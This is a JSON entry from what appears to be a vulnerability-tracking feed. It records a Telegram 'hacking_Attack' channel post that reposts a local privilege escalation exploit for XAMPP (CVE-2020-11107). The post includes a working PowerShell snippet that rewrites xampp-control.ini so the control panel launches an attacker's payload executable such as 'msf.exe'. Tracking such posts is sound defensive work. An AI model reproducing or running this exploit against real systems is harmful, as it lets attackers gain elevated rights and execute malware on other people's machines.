{"uuid": "037ec388-ab1c-4d2c-b244-cad377111a41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-11107", "type": "seen", "source": "https://t.me/hacking_Attack/25209", "content": "Exploit Collector\nXAMPP 7.4.3 Privilege Escalation\n\nhttps://3.bp.blogspot.com/-nGXsE6SnJzg/WWlu_4hmLPI/AAAAAAAAIKI/Orx5Bzmw2Dg1C2Ys8CQM09j0YgXq__7zgCLcBGAs/s1600/h120.png \nXAMPP version 7.4.3 suffers from a local privilege escalation vulnerability.\n\nMD5 | 8d79f4e52bb5093cf49c0944c183d58f\n\nDownload\n# Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation\n# Exploit Author: Salman Asad (@deathflash1411, salman@defmax.io)\n# Original Author: Maximilian Barz (@S1lkys)\n# Date: 27/09/2021\n# Vendor Homepage: https://www.apachefriends.org\n# Version: XAMPP &lt; 7.2.29, 7.3.x &lt; 7.3.16 &amp; 7.4.x &lt; 7.4.4\n# Tested on: Windows 10 + XAMPP 7.3.10\n# References: https://github.com/S1lkys/CVE-2020-11107\n\n$file = \"C:\\xampp\\xampp-control.ini\"\n$find = ((Get-Content $file)[2] -Split \"=\")[1]\n# Insert your payload path here\n$replace = \"C:\\temp\\msf.exe\"\n(Get-Content $file) -replace $find, $replace | Set-Content $file\n\nSource:packetstormsecurity.com\n\n___________________________ \n@hacking_Attack\n@Hacking_Video", "creation_timestamp": "2026-09-01T20:02:20.236008Z"}